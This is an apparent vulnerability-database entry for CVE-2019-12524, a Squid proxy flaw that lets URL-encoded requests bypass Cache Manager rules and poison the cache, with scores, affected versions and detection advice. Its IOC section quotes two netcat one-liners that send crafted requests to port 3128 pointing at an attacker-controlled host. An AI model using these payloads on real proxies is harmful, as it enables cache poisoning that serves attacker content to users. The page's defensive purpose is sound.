cbcvebase.
CVE-2019-12524
published 2020-04-15

CVE-2019-12524: An issue was discovered in Squid through 4.7. When handling requests from users, Squid checks its rules to see if the request should be denied. Squid by…

PriorityP260critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
4.15%
89.6th percentile
An issue was discovered in Squid through 4.7. When handling requests from users, Squid checks its rules to see if the request should be denied. Squid by default comes with rules to block access to the Cache Manager, which serves detailed server information meant for the maintainer. This rule is implemented via url_regex. The handler for url_regex rules URL decodes an incoming request. This allows an attacker to encode their URL to bypass the url_regex check, and gain access to the blocked resource.

Affected

10 ranges
VendorProductVersion rangeFixed in
canonicalubuntu_linux
canonicalubuntu_linux
debiandebian_linux
debiandebian_linux
debiansquid< squid 4.8-1 (bookworm)squid 4.8-1 (bookworm)
squid-cachesquid<= 4.7
squidsquid>= 0 < 4.8-14.8-1
squidsquid>= 0 < 4.8-14.8-1
squidsquid>= 0 < 4.8-14.8-1
squidsquid>= 0 < 4.8-14.8-1

Detection & IOCsextracted from sources · hover to see the quote

port3128
commandecho -e "GET https://hackerone.com%2f%[email protected]:8080/html/alert.html HTTP/1.1\r\n\r\n" |nc 3128
commandecho -e "GET ftp://hackerone.com/[email protected]:8080/payload HTTP/1.1\r\n\r\n" |nc 3128
urlhttp://www.squid-cache.org/Versions/v4/changesets/SQUID-2019_4.patch
urlhttp://www.squid-cache.org/Advisories/SQUID-2019_4.txt
  • Detect URL-encoded Cache Manager access bypass: look for percent-encoded sequences (%2f, %3f, etc.) in requests targeting Squid's Cache Manager path (cachemgr.cgi or /squid-internal-mgr/) that, when decoded, resolve to the blocked resource.
  • Detect HTTPS cache poisoning attempts: look for requests where the URL contains percent-encoded slashes and question marks in the userinfo/host portion (e.g., host%2f%3f@attacker-ip:port/path) sent to Squid proxy port 3128.
  • Detect FTP cache poisoning attempts: look for FTP requests with an @ symbol in the URL path (e.g., ftp://target.com/?@attacker-ip:port/payload) sent through Squid proxy, which abuses userInfo URL decoding to poison the cache.
  • Monitor Squid access logs for requests containing URL-encoded special characters (%2F, %3F, %40) in the host/userinfo portion of HTTPS or FTP URLs, which indicate exploitation of the url_regex ACL bypass or cache poisoning.
  • Flag cache HIT responses (X-Cache: HIT) served for requests whose URL contains an @ symbol with an IP address in the path, as this indicates a poisoned cache entry is being served to a victim.
  • The vulnerability exists in Squid through version 4.7 for HTTPS cache poisoning and through 4.9 for FTP cache poisoning; flag any Squid instance reporting these versions in its Server header (e.g., Server: squid/4.7, squid/4.9).
  • ·HTTPS cache poisoning (CVE-2019-12524) only applies when Squid is configured with ssl-bump and dynamic certificate generation (generate-host-certificates=on). Default Squid configurations without SSL bump are not vulnerable to the HTTPS variant.
  • ·The fix for CVE-2019-12524 only addressed the HTTPS aspect of cache poisoning; FTP cache poisoning remained exploitable until Squid 4.10, so patching to 4.8 alone does not fully remediate the FTP variant.
  • ·The url_regex ACL bypass affects the Cache Manager access control rule specifically; other ACL types are not affected by this URL-decoding issue.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu7.5HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.